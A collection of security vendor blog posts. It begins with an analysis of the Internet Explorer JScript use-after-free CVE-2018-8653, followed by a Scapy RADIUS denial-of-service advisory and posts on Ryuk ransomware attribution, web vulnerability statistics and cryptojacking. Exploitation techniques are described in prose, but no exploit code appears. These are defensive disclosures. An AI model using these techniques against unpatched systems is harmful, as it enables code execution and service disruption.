Using the popular diffing tool Diaphora, we compared the version of jscript.dll for Windows 10, x64-bit edition (feature version 1809).

We can see that only a few functions were modified. All but one point to array-related functions. Those were probably patches addressing CVE 2018-8631 (jscript!JsArrayFunctionHeapSort out-of-bounds write). The only one remaining that was substantially modified is NameTbl::InvokeInternal.

Diaphora provides us with a diff of the assembly code of the two versions of the function. In this instance, it is easier to compare the functions side by side in Ida Pro to see what has changed. A quick glance toward the end of the function shows the introduction of two calls to GCRoot::~GCRoot (the destructor of the object GCRoot).

Looking at the implementation of ~GCRoot, we see it is the same code as that inlined in that function created by the compiler in the older version of the DLL.

In the newer version of the DLL, this function is called twice; while in the unpatched version, the code was called only once (inlined by the compiler, hence the absence of a function call). In C++ parlance, ~GCRoot is the destructor of GCRoot, so we may want to find the constructor of GCRoot. An easy trick is to notice the magic offset 0x3D0 to see if this value is used anywhere else. We find it near the top of the same function (the unpatched version is on the left):

Diving into the nitty gritty of garbage collection for jscript.dll is beyond the scope of this post, so let’s make some assumptions. In C++/C#, GCRoot would usually design a template to keep track of references pointing to the object being used, so those do not have garbage collection. Here it looks as though we are saving stack addresses (aka local variables) into a list of GCRoot objects to tell the garbage collector not to collect the objects whose pointers are on those specific locations on the stack. In hindsight this makes sense; we were able to “delete this” because “this” was not tracked by the garbage collector, so now Microsoft makes sure to specifically add that stack variable to the tracked elements.

We can verify this hypothesis by tracing the code around an invocation of instanceof. It turns out that just before invoking our custom “isPrototypeOf” callback function, a call to NameTbl::GetVarThis stores a pointer in the newly “protected” stack variable and then invokes ScrFncObj::Call to execute our callback.

Looking at unexpected behavior in `instanceof`: Curious readers might wonder why it is possible to invoke instanceof on a custom object rather than on a function (as described previously). When instanceof is invoked in JavaScript, the CScriptRuntime::InstOf function is called behind the scene. Early on, the function distinguishes two cases. If the variable type is 0x81 (which seems to be a broad type for a JavaScript object on the heap), then it invokes a virtual function that returns true/false if the object can be called. On the other hand, if the type is not 0x81, a different path is followed; it tries to automatically resolve the prototype object and invoke isPrototypeOf.

The 0x81 path:

The not 0x81 path:

 

 

Proof of concept

Now that we have seen the ins and outs of the bug, let’s look at a simple proof of concept that exhibits the use-after-free behavior.

First, we set up a couple of arrays, so that everything that can be preallocated is allocated, and the heap is in a somewhat ready state for the use after free.

Then, we declare our custom callback and trigger the vulnerability:

For some reason, the objects array needs to be freed and garbage collected before the next step of the exploit. This could be due to some side effect of freeing the ActiveXObject. The memory is reclaimed when we assign “1” to the property reallocPropertyName. That variable is a magic string that will be copied over the recently freed memory to mimic legitimate variables. It is created as shown:

The 0x0003 is a variable type that tells us the following value is an integer and that 1337 is its value. The string needs to be long enough to trigger an allocation of the same or similar size as the memory block that was recently freed.

To summarize, JavaScript variables (here, the RegExp objects) are stored in a block; when all the variables from the block are freed, the block itself is freed. In the right circumstances, the newly allocated string can take the place of the recently freed block, and because “this” is still dangling in our callback, it can be used for some type confusion. (This is the method used by the attackers, but beyond the scope of this post.) In this example, the code will print 1337 instead of an empty RegExp.

McAfee coverage

Please refer to the McAfee product bulletin for full coverage updates. Here is a short summary of current product coverage as of this writing.

Endpoint products: Endpoint Security (ENS), ENS Adaptive Threat Protection (ENS-ATP), Host Intrusion Prevention (HIPS), VirusScan Enterprise (VSE), WSS.

  • ENS (10.2.0+) with Exploit Prevention
    • Proactively covered by McAfee Generic Buffer Overflow Protection Signature ID 428
  • HIPS (8.0.0+)
    • Proactively covered by McAfee Generic Buffer Overflow Protection Signature ID 428
  • ENS (all versions) and WSS (all versions). Coverage based on samples observed so far. This protection is expected to be expanded over the next few days as viable exploitation attempts are seen.
    • Minimum DAT: V3 DAT (3564)
    • Detection names: Exploit-CVE2018-8653 and Exploit-CVE2018-8653.a
  • VSE (8.8+). Coverage based on samples observed so far. This protection is expected to be expanded over the next few days as viable exploitation attempts are seen.
    • Minimum DAT: V2 DAT (9113)
    • Detection names: Exploit-CVE2018-8653 and Exploit-CVE2018-8653.a

Content summary

  • DATs: V2 DAT (9113), V3 DAT (3564)
  • Generic Buffer Overflow Protection Signature ID 428

MITRE score

The base score (CVSS v3.0) for this vulnerability is 7.5 (High) with an impact score of 5.9 and an exploitability score of 1.6.

Conclusion

CVE-2018-8653 targets multiple versions of Internet Explorer and other applications that rely on the same scripting engine. Attackers can execute arbitrary code on unpatched hosts from specifically crafted web pages or JavaScript files. Even though the bug was recently fixed by Microsoft, we can expect exploit kits to soon deploy a weaponized version of this critical vulnerability, leveraging it to target remaining unpatched systems. The technical analysis in this post should provide enough information for defenders to ensure their systems will withstand the threat and to know which primitives to look for as an entry point for the attack. McAfee security products can be leveraged to provide specific “virtual patching” for this threat until full software patches can be deployed, while current generic buffer overflow protection rules can be used to fingerprint exploit attempts against this and similar vulnerabilities.

The post IE Scripting Flaw Still a Threat to Unpatched Systems: Analyzing CVE-2018-8653 appeared first on McAfee Blogs.

HHS Publishes Health Industry Cybersecurity Practices

The U.S. Department of Health and Human Services (“HHS”) recently announced the publication of “Health Industry Cybersecurity Practices: Managing Threats and Protecting Patients” (the “Cybersecurity Practices”). The Cybersecurity Practices were developed by the Healthcare & Public Health Sector Coordinating Councils Public Private Partnership, a group comprised of over 150 cybersecurity and healthcare experts from government and private industry.

The Cybersecurity Practices are currently composed of four volumes: (1) the Main Document, (2) a Technical Volume of cybersecurity practices for small healthcare organizations, (3) a Technical Volume of cybersecurity practices for medium and large healthcare organizations, and (4) a Resources and Templates Volume. The Cybersecurity Practices also will include a Cybersecurity Practices Assessments Toolkit, but that is still under development.

The Main Document provides an overview of prominent cyber attacks against healthcare organizations and statistics on the costs of such attacks—such as that in 2017, cyber attacks cost small and medium-sized businesses an average of $2.2 million—and lists the five most common cybersecurity threats that impact the healthcare industry: (1) email phishing attacks, (2) ransomware attacks, (3) loss or theft of equipment or data, (4) insider, accidental or intentional data loss and (5) attacks against connected medical devices that may affect patient safety. The Main Document describes real world scenarios exemplifying each threat, lists “Threat Quick Tips,” analyzes the vulnerabilities that lead to such threats, discusses the impact of such threats and provides practices for healthcare organizations (and their employees) to consider to counter such threats. The Main Document concludes by noting that it is essential for healthcare organizations and government to distribute “relevant, actionable information that mitigates the risk of cyber-attacks” and argues for a “culture change and an acceptance of the importance and necessity of cybersecurity as an integrated part of patient care.”

The two Technical Volumes list the following 10 cybersecurity practices for small and medium and large healthcare organizations:

  • email protection systems;
  • endpoint protection systems;
  • access management;
  • data protection and loss prevention;
  • asset management;
  • network management;
  • vulnerability management;
  • incident response;
  • medical device security; and
  • cybersecurity policies.

The Technical Volumes also list cybersecurity sub-practices and advice for healthcare organizations to follow, with the noted distinction that small healthcare organizations are focused on cost-effective solutions while medium and large organizations may have more “complicated ecosystems of IT assets.”

Finally, the Resources and Template Volume maps the 10 cybersecurity practices and sub-practices to the NIST Cybersecurity Framework. It also provides templates such as a Laptop, Portable Device, and Remote Use Policy and Procedure, Security Incident Response Plan, an Access Control Procedure, and a Privacy and Security Incident Report.

In announcing the Cybersecurity Practices, HHS Acting Chief Information Security Officer stated that cybersecurity is “the responsibility of every organization working in healthcare and public health. In all of our efforts, we must recognize and leverage the value of partnerships among government and industry stakeholders to tackle the shared problems collaboratively.”

The Cybersecurity Practices follow other key important cybersecurity documents published by HHS, including the checklist on cyberattacks and the ransomware fact sheet.

Best practices for securely using Microsoft 365—the CIS Microsoft 365 Foundations Benchmark now available

This post was cowritten by Jonathan Trull, Chief Security Advisor, Cybersecurity Solutions Group, and Sean Sweeney, Chief Security Advisor, Cybersecurity Solutions Group.

Were excited to announce the availability of the Center for Internet Securitys (CIS) Microsoft 365 Foundations Benchmarkdeveloped by CIS in partnership with Microsoftto provide prescriptive guidance for establishing a secure baseline configuration for Microsoft 365. CIS is a nonprofit entity focused on developing global standards and recognized best practices for securing IT systems and data against the most pervasive attacks.

Microsoft 365 provides powerful online cloud services that enable collaboration, security, and compliance, mobility, intelligence, and analytics. Adopting cloud technologies requires a shared responsibility model for security, with Microsoft responsible for certain controls and the customer responsible for others, depending on the service delivery model chosen. To ensure that a customers cloud workloads are protected, it is important that they carefully consider and implement the appropriate architecture and enable the right set of configuration settings.

The CIS Microsoft 365 Foundations Benchmark is designed to assist organizations in establishing the foundation level of security for anyone adopting Microsoft 365. The benchmark should not be considered as an exhaustive list of all possible security configurations and architecture but as a starting point. Each organization must still evaluate their specific situation, workloads, and compliance requirements and tailor their environment accordingly.

The CIS benchmark contains two levels, each with slightly different technical specifications:

  • Level 1Recommended minimum security settings that should be configured on any system and should cause little or no interruption of service or reduced functionality.
  • Level 2Recommended security settings for highly secure environments and could result in some reduced functionality.

The CIS Microsoft 365 Security Benchmark is divided into the following sections:

Section Description # of recommended controls
Account/Authentication policies Recommendations related to setting the appropriate account and authentication policies. 8
Application permissions Recommendations related to the configuration of application permissions within Microsoft 365. 4
Data management Recommendations for setting data management policies. 6
Email security/Exchange Online Recommendations related to the configuration of Exchange Online and email security. 13
Auditing policies Recommendations for setting auditing policies on your Microsoft 365 tenant. 14
Storage policies Recommendations for securely configuring storage policies. 2
Mobile device management Recommendations for managing devices connecting to Microsoft 365. 13
Total recommendations 60

Each recommendation contains several sections, including a recommendation identification number, title, and description; level or profile applicability; rationale; instructions for auditing the control; remediation steps; impact of implementing the control; default value; and references. For example, the first control contained in the benchmark is under the Account/Authentication policies section and is titled: 1.1 (L1) Ensure multifactor authentication is enabled for all users in administrative roles (Scored).

A control is marked as Scored or Not Scored based on whether it can be programmatically tested. In this case, recommendation 1.1 can be audited leveraging the Microsoft Graph and PowerShell cmdlet. The specific steps for auditing the control are contained in the Audit section for this specific recommendation. This recommendation is listed as a Level 1 control because it is only applied to Microsoft 365 administrative users and would not have a company-wide impact or produce less functionality for users. The rationale for recommendation 1.1 is that Microsoft 365 administrative accounts need to be protected due to their powerful privileges and with Multiple Factor Authentication, an attacker would need to compromise at least two different authentication mechanisms, increasing the difficulty of compromise and thus reducing the risk to the Azure tenant.

Download the benchmark and provide your feedback

The CIS Microsoft 365 Security Benchmark is freely available for download in PDF format on the CIS website. In the continuity of their mission, feedback provided by those entrenched in using and implementing the benchmarks provides us the opportunity for continuous improvement of our products. Feedback can be made visible to CIS by creating a discussion thread or ticket within the CIS Microsoft 365 Foundations Benchmark community. In addition, Microsoft has developed a set of Office 365 security guidelines and best practices for our customers to follow. These guides can be found in Office 365 Security and Compliance documentation.

The post Best practices for securely using Microsoft 365—the CIS Microsoft 365 Foundations Benchmark now available appeared first on Microsoft Secure.

Ryuk Ransomware Attack: Rush to Attribution Misses the Point

Senior analyst Ryan Sherstobitoff contributed to this report.

During the past week, an outbreak of Ryuk ransomware that impeded newspaper printing services in the United States has garnered a lot of attention. To determine who was behind the attack many have cited past research that compares code from Ryuk with the older ransomware Hermes to link the attack to North Korea. Determining attribution was largely based on the fact that the Hermes ransomware has been used in the past by North Korean actors, and code blocks in Ryuk are similar to those in Hermes.

The McAfee Advanced Threat Research team has investigated this incident and determined how the malware works, how the attackers operate, and how to detect it. Based on the technical indicators, known cybercriminal characteristics, and evidence discovered on the dark web, our hypothesis is that the Ryuk attacks may not necessarily be backed by a nation-state, but rather share the hallmarks of a cybercrime operation.

How McAfee approaches attribution

Attribution is a critical part of any cybercrime investigation. However, technical evidence is often not enough to positively identify who is behind an attack because it does not provide all the pieces of the puzzle. Artifacts do not all appear at once; a new piece of evidence unearthed years after an attack can shine a different light on an investigation and introduce new challenges to current assumptions.

Ryuk attack: putting the pieces together

In October 2017, we investigated an attack on a Taiwanese bank. We discovered the actors used a clever tactic to distract the IT staff: a ransomware outbreak timed for the same moment that the thieves were stealing money. We used the term pseudo-ransomware to describe this attack. The malware was Hermes version 2.1.

One of the functions we often see in ransomware samples is that they will not execute if the victim’s system language is one of the following:

  • 419 (Russian)
  • 422 (Ukrainian)
  • 423 (Belarusian)

That was October 2017. Searching earlier events, we noticed a posting from August 2017 in an underground forum in which a Russian-speaking actor offered the malware kit Hermes 2.1 ransomware:

What if the actor who attacked the Taiwanese bank simply bought a copy of Hermes and added it to the campaign to cause the distraction? Why go to the trouble to build something, when the actor can just buy the perfect distraction in an underground forum?

In the same underground forum thread we found a post from October 22, 2018, mentioning Ryuk.

This post contains a link to an article in the Russian security magazine Xakep.ru (“Hacker”) discussing the emergence of Ryuk and how it was first discovered by MalwareHunterTeam in August 2018. This first appearance came well before last week’s attack on newspaper printing services.

Manga connection

Ryuk, according to Wikipedia, refers to a Japanese manga character from the series “Death Note.” Ryuk apparently drops a death note, a fitting name for ransomware that drops ransom notes.

Ransomware is typically named by its cybercriminal developer, as opposed to the naming of state-sponsored malware, which is mostly is done by the security industry. It seems the criminals behind Ryuk are into manga.

The use of manga character names and references is common in the cybercriminal scene. We often come across manga-inspired nicknames and avatars in underground forums.

Technical indicators

Looking at research from our industry peers comparing Ryuk and Hermes, we notice that the functionalities are generally equal. We agree that the actors behind Ryuk have access to the Hermes source code.

Let’s dive a bit deeper into Ryuk and compare samples over the last couple of months regarding compilation times and the presence of program database (PDB) paths:

We can see the PDB paths are almost identical. When we compare samples from August and December 2018 and focus on the checksum values of the executables’ rich headers, they are also identical.

From a call-flow perspective, we notice the similarities and evolution of the code:

The Hermes 2.1 ransomware kit, renamed and redistributed as Ryuk.

The author and seller of Hermes 2.1 emphasizes that he is selling is a kit and not a service. This suggests that a buyer of the kit must do some fine tuning by setting up a distribution method (spam, exploit kit, or RDP, for example) and infrastructure to make Hermes work effectively. If changing a name and ransom note are part of these tuning options, then it is likely that Ryuk is an altered version Hermes 2.1.

Attribution: analyzing competing hypotheses

In the race to determine who is behind an attack, research facts (the What and How questions) are often put aside to focus on attribution (the Who question). Who did it? This pursuit is understandable yet fundamentally flawed. Attribution is crucial, but there will always be unanswered questions. Our approach focuses on answering the What and How questions by analyzing the malware, the infrastructure involved, and the incident response performed at the victim’s site.

Our approach is always to analyze competing hypotheses. When investigating an incident, we form several views and compare all the artifacts to support these hypotheses. We try not only to seek verifying evidence but also actively try to find evidence that falsifies a hypothesis. Keeping our eyes open for falsifying facts and constantly questioning our results are essential steps to avoid conformation bias. By following this method, we find the strongest hypothesis is not the one with the most verifying evidence, but the one with the least falsifying evidence.

Examining competing hypotheses is a scientific approach to investigating cyber incidents. It may not help with the race to attribution, but it ensures the output is based on available evidence.

The most likely hypothesis in the Ryuk case is that of a cybercrime operation developed from a tool kit offered by a Russian-speaking actor. From the evidence, we see sample similarities over the past several months that indicate a tool kit is being used. The actors have targeted several sectors and have asked a high ransom, 500 Bitcoin. Who is responsible? We do not know. But we do know how the malware works, how the attackers operate, and how to detect the threat. That analysis is essential because it allows us to serve our customers.

The post Ryuk Ransomware Attack: Rush to Attribution Misses the Point appeared first on McAfee Blogs.

Guide to Developing a National Cybersecurity Strategy—a resource for policymakers to respond to cybersecurity challenges

Nations from every corner of the world are increasingly leveraging digital transformation to grow their economies and empower businesses to improve services, including vital services provided by critical infrastructures. This adoption of new information communications technologies (ICT) has unfortunately been accompanied by a rapid expansion in the frequency and severity of cyberattacks, prompting government policymakers to seek solutions that address these new challenges. The recently released Guide to Developing a National Cybersecurity Strategy provides helpful guidance to support this work.

Developing effective policies to respond to cybersecurity challenges requires more than a whole-of-government response; it involves a whole-of-nation effort, with government ministries and experts from across sectors of the economy and from civil society collaborating to create approaches that simultaneously improve security and enable innovation. The Guide to Developing a National Cybersecurity Strategy is a comprehensive document for policymakers working to either establish, or update and evolve upon, their respective national cybersecurity strategies. It was developed in partnership with leading voices from government, civil society, academia, and industry.

Such authentic multi-stakeholder collaboration is essential, though too often absent, in the development of effective cybersecurity policies. This type of engagement takes time and commitment from all parties involved to engage in a deliberate and iterative processlistening to and valuing all perspectivesto reach agreement. While requiring greater time and careful balance, this type of inclusive process results in policies that are effective and enduring. We at Microsoft are grateful to have been included in the development of this guide and are proud of the result.

The Guide to Developing a National Cybersecurity Strategy should be used by policymakers tasked with developing or improving upon national strategies. It carefully lays out both the process for developing cyber strategies, as well as the essential content that needs to be included, based on international best practices, regardless of the cultural, social, or economic context of any particular country. The process and content provided in the guide are presented across four main sections, which include:

  • An essential overview of cybersecurity policymakingA bit of a summary, the overview includes clear definitions and explanations of associated topics and concepts that policymakers should keep top of mind when developing a national strategy.
  • The strategy development lifecycleOutlines the lifecycle of developing and then maintaining an effective national cybersecurity strategy, breaking down the essential steps along the way and explaining who needs to be included in the decision-making process, and then how the strategy is to be implemented and managed once it is complete.
  • Overarching principles of a strategyShifts the focus to the content of the strategy itself. The principles provide policymakers with high-level, fundamental considerations that must be taken into account during the development of effective strategies.
  • Focus areas and good practicesZooms in on specifics. It identifies the key elements and topics that should be addressed during the development of a strategy by walking through seven specific focus areas.

The guide truly is a valuable resource for policymakers in any context, whether a nations cybersecurity strategy is currently in place or still needs to be developed. Because that is perhaps the most important lesson of the guide itselfa national cybersecurity strategy is not simply a box to be checked and set aside, but rather an ongoing and recursive process of creating, implementing, and improving strategies to adapt to new opportunities and challenges associated with the ever-evolving world of technology.

The post Guide to Developing a National Cybersecurity Strategy—a resource for policymakers to respond to cybersecurity challenges appeared first on Microsoft Secure.

The State of Web Application Vulnerabilities in 2018

(Jan. 12 update:  Due to a data transfer error, some of the 2017 figures were incorrectly reported; this version of the blog has been corrected. This error did not affect our 2018 statistics, nor our conclusions.)

As a web application firewall provider, part of our job at Imperva is to continually monitor for new security vulnerabilities. To do this, we use internal software that collects information from various data sources such as vulnerability databases, newsletters, forums, social media and more, integrates it into a single repository, and assesses each vulnerability’s priority. Having this kind of data puts us in a unique position to provide an analysis of all web application vulnerabilities throughout the year, view trends, and notice significant changes in the security landscape. As we did last year, we took a look back at 2018 to understand the changes and trends in web application security over the past year.

The bad news is that in 2018, like 2017, we continued to see a trend of increasing number of web application vulnerabilities, particularly vulnerabilities related to injection such as SQL injection, command injection, object injection, etc. On the content management system (CMS) front, WordPress vulnerabilities continue to grow, and they continue to dominate in terms of the number of vulnerabilities published in the CMS category. Although WordPress leads the pack in sheer vulnerabilities numbers, Drupal vulnerabilities had a larger effect and were used in mass attacks that targeted hundreds of thousands of sites during 2018. However, there is some good news for the security industry — the number of Internet of Things (IoT) vulnerabilities declined, as well as the number of vulnerabilities related to weak authentication. In the server side technologies category, the number of PHP vulnerabilities continued to decline. In addition, the growth in API vulnerabilities also slightly declined.

2018 Web Application Vulnerabilities Statistics

The first phase in our yearly analysis was to check the amount of vulnerabilities published in 2018 in comparison to previous years. Figure 1 shows the number of vulnerabilities on a monthly basis over the last three years. We can see that the overall number of new vulnerabilities in 2018 (17,308) increased by 23% compared to 2017 (14,082) and by 162% compared to 2016 (6,615). According to our data, more than half of web application vulnerabilities (54%) have a public exploit available to hackers. In addition, more than a third (38%) of web application vulnerabilities don’t have an available solution, such as a software upgrade workaround or software patch.

 


Figure 1: Number of web application vulnerabilities in 2016-2018

Vulnerabilities by Category

In Figure 2, you can find 2018 vulnerabilities split into OWASP TOP 10 2017 categories.

Most Common Vulnerability: Injections

The dominant category this year was by far injections, with 19% (3,294) out of the total vulnerabilities of 2018, which is also a 267% increase from last year. When talking about injection vulnerabilities, the first thing that jumps to mind is SQL injections. When drilling down the data, however, we saw remote command execution (RCE) emerge as the bigger issue, with 1,980 vulnerabilities (11.5%), compared to 1,354 vulnerabilities (8%) for SQLi.

Figure 2: Vulnerabilities into categories 2014-2018

No. 2 Vulnerability — Cross-Site Scripting

The number of Cross-site scripting (XSS) vulnerabilities continued to grow and appears to be the second most common vulnerability (14%) among 2018 web application vulnerabilities.

IoT Vulnerabilities Decreased

It appears that the number of IoT vulnerabilities has decreased tremendously. Despite the common belief that all our electronic devices can be easily compromised, it appears that something has changed in this area. Possible explanations include: IoT vendors have finally started to implement better security in IoT devices, or that hackers and researchers found another area to focus on in 2018.


Figure 3: IoT vulnerabilities 2014-2018

API Vulnerabilities: Growing, but Slowing

API (Application Programming Interface) vulnerabilities are becoming more widespread as time goes by. Figure 4 shows the number of API vulnerabilities between 2015-2018. New API vulnerabilities in 2018 (264) increased by 23% over 2017 (214), by 56% compared to 2016 (169), and by 154% compared to 2015 (104).


Figure 4: API vulnerabilities 2015-2018

Although API vulnerabilities continue to grow year-over-year, it appears to be slowing, from 63% between 2015-16 to 27% in 2016-2017 and now 23% between 2017-18. One possible explanation is that since APIs are more popular nowadays, they draw more attention from hackers and security researchers. In turn, organizations spend more time securing their APIs.

Vulnerabilities in Content Management Systems: Attackers Focused on WordPress

The most popular content management system is WordPress, used by over 28% of all websites, and by 59% of all websites using a known content management system, according to market share statistics cited by Wikipedia, followed by Joomla and Drupal. Perhaps unsurprisingly, WordPress also registered the highest number of vulnerabilities (542) last year, which is a 30% increase from 2017 (Figure 5).


Figure 5: Number of vulnerabilities by CMS platform 2016-2018

According to the WordPress official site, the current number of plugins is 55,271. This means that only 1,914 (3%) were added in 2018.


Figure 6: Number of WordPress plugins

Despite the slowed growth in new plugins, the number of WordPress vulnerabilities increased. The explanation for this could either be the code quality of the plugins, or the fact that WordPress is such a popular CMS, which motivate more attackers to develop dedicated attack tools and try their luck searching for holes in the code.

Unsurprisingly, 98% of WordPress vulnerabilities are related to plugins  (see Figure 7 below), which extend the functionality and features of a website or a blog. Anyone can create a plugin and publish it — WordPress is open source, easy to manage, and there is no enforcement or any proper process that mandates minimum security standards (e.g. code analysis). Hence, WordPress plugins are prone to vulnerabilities.


Figure 7: WordPress third party vendor vulnerabilities in 2018

In Figure 8 below, you can find the ten WordPress plugins with the most vulnerabilities discovered in 2018. Note that these are not necessarily the most-attacked plugins as the report refers to the amount of vulnerabilities seen throughout the year – and is based upon the continual aggregation of vulnerabilities from different sources. Our annual report is solely based on statistics from this system, and we listed all vulnerabilities that were published during 2018 in general, in WordPress and WordPress plugins. This indicator solely looks at the most vulnerabilities. There are other measures that are not included in the report – such as ‘top attacked’ or ‘riskiest’ – which do not necessarily correlate with this measurement.



Figure 8: Top 10 vulnerable WordPress plugins in 2018

Server Technologies: PHP Vulnerabilities Fell

Since the most popular server-side programming language for websites continues to be PHP, we expect it to have more vulnerabilities than equivalent languages. And that was true. However, as Figure 9 below shows, new vulnerabilities in PHP fell in 2018 versus 2017, just as they did in the prior year. The lack of PHP updates – only one minor update was released, PHP 7.3, in December – could explain why.


Figure 9: Top server-side technology vulnerabilities 2014-2018

The Year of Drupal

Although Drupal is the third-most popular CMS, two of its vulnerabilities, CVE-2018-7600 (’23-mar’ bar in Figure 10 below), and CVE-2018-7602 (’25-apr’ bar below, also known as Drupalgeddon2 and Drupalgeddon3), were the root cause of many security breaches in hundreds of thousands of web servers in 2018. These vulnerabilities allowed an unauthenticated attacker to remotely inject malicious code and run it on default or common Drupal installations. These vulnerabilities allow attackers to connect to backend databases, scan and infect internal networks, mine cryptocurrencies, infect clients with trojans, and more.

The simplicity of these Drupal vulnerabilities and their catastrophic impact made them a weapon of choice for many attackers. In fact, Imperva detected and blocked more than half a million attacks related to these vulnerabilities during 2018. These attacks were also the basis for a few interesting blogs we wrote this year. There was another risky vulnerability, part of the Drupal security patch sa-core-2018-006, that published in October. However, since it was not easy to exploit, the number of attacks was small.

 

Figure 10: CVSS Score of Drupal vulnerabilities in 2018

Predictions for 2019

As a security vendor, we’re often asked about our predictions. Here are our vulnerability predictions for 2019:

  • PHP announced that versions 5.5, 5.6 and 7.0 reached their end of life. That means that these versions will no longer receive security updates. Major CMS like WordPress, Drupal, and Joomla are developed in PHP and require newer versions of PHP. However, they still support older versions. The result is that hackers are now motivated to find new security vulnerabilities in unsupported PHP versions since they will not be fixed and impact every application built with these outdated versions. For example, according to Shodan there are currently 34K servers with these unsupported PHP versions
  • Injection vulnerabilities will continue to grow mainly because of the economic implications to attackers (make fast money)
  • More vulnerabilities in APIs will be discovered as DevOps become a crucial factor in IT and their usage and demand for APIs is growing

How to Protect Your Apps and Data

One of the best solutions for protecting against web application vulnerabilities is to deploy a web application firewall (WAF). A WAF may be either on-premises, in the cloud or a combination of both depending on your needs, infrastructure, and more. As organizations are moving more of their apps and data to the cloud, it’s important to think through your security requirements. A solution supported by a dedicated security team is one to add to your selection criteria. Security teams can push timely security updates to a WAF in order to properly defend your assets.

 

 

The post The State of Web Application Vulnerabilities in 2018 appeared first on Blog.

Preventing Cryptojacking Malware with McAfee WebAdvisor’s New Cryptojacking Blocker

By now, you’ve probably heard of cryptocurrency, but you may not know exactly what it is. To put it simply, cryptocurrencies are virtual currencies that have actual monetary value in today’s world. They are limited entries of transactions into a single database, or public ledger, that can’t be changed without fulfilling certain conditions. These transactions are verified and added to the public ledger through cryptocurrency mining. Cryptocurrency miners try to make money by compiling these transactions into blocks and solving complicated mathematical problems to compete with other miners for the cryptocurrency. While this process of mining for cryptocurrencies can be lucrative, it requires large amounts of computing power.

Unfortunately, the need for massive amounts of hardware has provoked cybercriminals to participate in cryptojacking, a method of using malware to exploit victims’ computers to mine for cryptocurrencies. Cybercrooks spread cryptojacking malware through sketchy mobile apps, flawed software, and malware-infected ads. They can even cryptojack your device during a browsing session while you’re perusing a website that appears completely harmless. Once a user’s device becomes infected, the malware drains the device’s CPU, causing the user’s computer fan to be loud while the malware mines for cryptocurrencies in the background. Unfortunately, symptoms of cryptojacking are usually pretty subtle, with poor device performance being one of the few signs of its presence.

Thankfully, McAfee WebAdvisor is here to help. This security solution, which helps block users from malware and phishing attempts, now includes Cryptojacking Blocker. This enhancement is a Windows-based browser add-on available for Google Chrome that helps stop malicious websites from mining for cryptocurrency. So far, our direct and retail McAfee WebAdvisor customers have already started receiving the update that adds Cryptojacking Blocker to their product, and the customers who have WebAdvisor through other partners should begin to see this update roll out during Q1. The same thing goes for those who own McAfee LiveSafe and McAfee Total Protection. Additionally, we’re aiming to add support for Firefox in the coming months. And if you don’t already have WebAdvisor, you can download it for free on our website, with Cryptojacking Blocker included in your download.

In addition to using a security solution like McAfee WebAdvisor, here are some other general tips to help you stay safe online:

  • Create a strong, unique password. Although it may be easier to remember, reusing passwords across multiple accounts puts all of your data at risk even if just one of your accounts is breached. Choosing a complex password for each individual online account will act as a stronger first line of defense. You can also use a password manager so all of your credentials are consolidated into one place.
  • Be careful where you click. If you come across a website that seems sketchy or notice that the URL address looks odd, avoid interacting with the site entirely. Stick to browsing websites you know are reputable.
  • Update, update, update! Cybercriminals can take advantage of old software to spread cryptojacking malware. Keeping your software updated with the latest patches and security fixes can help you combat this threat.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Preventing Cryptojacking Malware with McAfee WebAdvisor’s New Cryptojacking Blocker appeared first on McAfee Blogs.

Scapy-sploit: Python Network Tool is Vulnerable to Denial of Service (DoS) Attack CVE pending

We recently discovered that the latest version of Scapy, a powerful packet manipulation tool used by cybersecurity researchers and network engineers, is susceptible to a Denial of Service (DoS) vulnerability. Ironically, we found this vulnerability while researching ways to better detect and fight DDoS attacks.

Written in the very popular Python coding language, Scapy uses a heuristic algorithm to determine the type of network packet it is inspecting. Because the algorithm relies on port numbers, the packet type can be easily spoofed. In this case, the vulnerability occurs when Scapy is tricked into thinking a network packet is a RADIUS packet. The vulnerability is due to a lack of input validation when reading the length field in the RADIUS packet’s Attribute Value Pairs (AVP). This can cause an infinite loop in the following code section if a certain byte is set to zero:


When Scapy parses a UDP Radius packet that has an AVP with a length byte equal to zero, the getfield function doesn’t shorten the remain value in the while loop. This causes the loop to continue forever, resulting in a Denial of Service (DoS) to Scapy, causing Scapy to crash. This can potentially affect the health of an enterprise network – for instance, if Scapy is being used by IT to monitor network traffic, the monitoring process will stop functioning.

 

Although this bug was reported and patched, the current Scapy version 2.4.0 available from the Python pip repositories is susceptible to this attack. We tested for this vulnerability using macOS and Ubuntu Linux with both Python 2.7 and Python 3 and found them all vulnerable.

Here is the remote exploit:

Here is the patch:
https://github.com/secdev/scapy/pull/1409/files#diff-441eff981e466959968111fc6314fe93L1058
The solution: clone and build Scapy directly from the github repo:
https://github.com/secdev/scapy

Conclusion:

The current version of Scapy can be DoSed quite easily. The potential impact is large – Scapy is quite a popular tool, and other libraries that depend on Scapy might be vulnerable as well. Networks relying on Scapy for traffic monitoring or other functions can also be affected.  If you’re using the affected version of Scapy, or any library that depends on Scapy, we advise you to apply the patch as soon as possible. 

Advisory Scapy 2.4.0 – Denial of Services
Authors: Johnathan Azaria and Koby Kilimnik
Vendor url: https://scapy.net/
Status: Patched (but not released to pip repo)
Tested on: macOS sierra 10.12.6 and Ubuntu Linux 16.04

 

A partial list of libraries with a Scapy dependency that might be affected as well:

  • IcmpTool-0.1.8
  • jldcmds-0.3
  • mim-0.2.43 – man in the middle proxy
  • ooniprobe-1.3.2 – network analysis tool
  • pyersinia-1.0.5 – another network analysis tool
  • pysap-0.1.8 – python library that communicates with sap
  • scapy-http-1.8

 

 

The post Scapy-sploit: Python Network Tool is Vulnerable to Denial of Service (DoS) Attack CVE pending appeared first on Blog.

Be careful of data without context: The case of malware scanning of journaled emails

Recently, we shared details on how effectiveness is measured for Office 365 Exchange Online Protection (EOP) and Advanced Threat Protection (ATP). We also followed up with a comprehensive update on Office 365s improved ability to stop phishing emails from impacting users. These reports highlighted:

  • Enhanced anti-phish capabilities for EOP/ATP.
  • Visibility and transparency into our testing methods.
  • Performance improvements from the engineering updates.

Today, well cover recent research on a testing methodologyemail journalingwhich is often used but can lead to misinterpreted results.

What is email journaling?

Email journaling (Figure 1) is when an organization enables recording of emails for retention or archiving. With growing regulatory requirements, organizations increasingly must maintain records of communications between employees performing daily business tasks. Journaling helps organizations respond to legal, regulatory, and organizational compliance requirements by recording inbound and outbound email communications. Exchange Online offers in-depth journaling capabilities. Microsoft provides extensive and up-to-date recommendations on how organizations can manage and configure journaling requirements.

Figure 1. Email journaling mail flow.

The effect of journaling on email security

